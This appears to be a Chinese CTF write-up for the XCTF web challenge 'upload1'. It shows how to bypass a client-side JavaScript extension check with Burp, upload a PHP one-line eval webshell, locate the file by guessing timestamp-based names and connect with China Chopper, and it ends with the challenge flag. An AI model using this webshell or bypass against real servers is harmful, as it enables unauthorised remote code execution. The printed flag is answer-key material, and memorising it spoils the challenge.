攻防世界WEB进阶之upload1
攻防世界WEB进阶之upload1
- 一、分析
- 二、实操
- 三、答案
难度系数: 1星
题目来源: 暂无
题目描述:暂无
题目场景: 略
题目附件: 暂无
一、分析
首先打开场景,上传文件进行抓包操作,发现存在部分js代码。
function check(){upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');if(['jpg','png'].contains(ext)){submit.disabled = false;
}else{submit.disabled = true;alert('请选择一张图片文件上传!');
}
然而只是一个检查文件名的函数:ext = name.replace(/^.+./,’’)删除文件的名称
if([‘jpg’,‘png’].contains(ext)):检查后缀是否为jpg,如果不是就禁用按钮并弹窗报错。
上传png文件:
访问上传的文件能够被打开:
但是访问http://111.198.29.45:59162/upload/显示页面访问是被禁止的
使用IP伪造:
尝试失败
尝试一句话木马:<?php @eval($_POST['chopper']);?>
上传成功但是使用菜刀无法连接
尝试失败,我好难啊
二、实操
其实之前使用中国菜刀没毛病的自己没有修改上传的文件的后缀导致文件上传上去为jpg格式可以连接
后缀名成不正确是无法执行对应的语句的,所以需要绕过前端的文件后缀检查
通过burp抓包,将后缀名称修改为php即可
文件文件上传完毕,怎么连接呢?首先我们应该知道对应上传文件在服务器的位置
系统自动生成了文件名,但实际上是有迹可循的,是使用unix时间戳+文件名的形式
我们刚开始上传的文件有一个反馈的文件名
根据1570000745.s.jpg 文件名称,我们可以推测出修改文件后缀的文件名称通过加1的方式持续几次就能找到
终于找到了,可以开始使用中国菜刀进行连接啦!
#关于中国菜刀的,我提供了一个版本,需要的童鞋自取下载链接是
https://download.csdn.net/download/harry_c/11423598
啦啦啦,连接成功了
三、答案
最终我们终于找到了flag.php文件
打开就是最终的flag
至此最终的flag为:cyberpeace{5424056c1c4d35b8fc267df74b70bdea}
攻防世界WEB进阶之upload1相关推荐
- 攻防世界web进阶区Web_php_wrong_nginx_config详解
攻防世界web进阶区Web_php_wrong_nginx_config详解 题目 详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robo ...
- 攻防世界WEB进阶之ics-05
攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...
- 攻防世界web进阶区ics-05详解
攻防世界web进阶区ics-05详解 题目 解法 preg_replace ctype_alnum strpos X-Forwarded-For 题目 我们只能点击一个地方 解法 御剑扫描有一个css ...
- 攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
前言 题目来源:攻防世界-WEB进阶----ics-06 使用工具:Burpsuite 题目 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下入侵者的痕迹 分析 这里只有报表 ...
- 攻防世界WEB进阶之upload
攻防世界WEB进阶之upload 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 1星 题目来源: RCTF-2015 题目描述:暂无 脑洞很大的一题,首先题目什么都没给出,进入场 ...
- 攻防世界web进阶区Web_python_block_chain详解
攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...
- 攻防世界WEB进阶之Cat
攻防世界WEB进阶之Cat 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只 ...
- 攻防世界web进阶区wtf.sh-150详解
攻防世界web进阶区wtf.sh-150详解 题目 详解 题目 看起来像一个论坛,可以注册,登录 详解 我们随便打开一个 尝试注入 并没有发现可以注入 注册发现,admin已经存在, 我们看看能不能二 ...
- 攻防世界 Web进阶(一)
嗯-,终于把新手区的题做完了,感觉学到了不少东西( •̀ ω •́ )y 今天来记录下进阶题 1.ics-06 打开题目,一个看起来看来很炫酷的页面,瞎点一会发现只有一个报表中心可以进 一开始以为是s ...
最新文章
- Lossless Codec---APE代码解读系列(二)
- Intel® Media Server Studio Support
- CSS中的EM属性-弹性布局
- java 性能 排序_Java常用排序算法及性能测试集合
- SAP Cloud for Customer里新的Lead UI对Mashup集成的支持原理
- smtplib 抄送邮件_用Python收发电子邮件
- 我想变得富有的10个理由
- 前端学习(2834):样式引入
- iptv直播源m3u_Padavan 单线复用实现拨号上网加IPTV 操作记录
- Windows下Mysql定时备份的实现
- php微信支付回调验证
- wpa_supplicant 中 ISupplicant 服务代理客户端对象获取
- Html5下载功能实现
- cmd命令查看本机网外地址
- Android 混淆规则
- 小学-知识与能力【5】
- 因子分析——流程与实现stata
- 《所谓高情商,就是会说话》思维导图精华分享
- 如何将刷题的效率提升10倍
- 用java去掉字符串中空格,存入数据库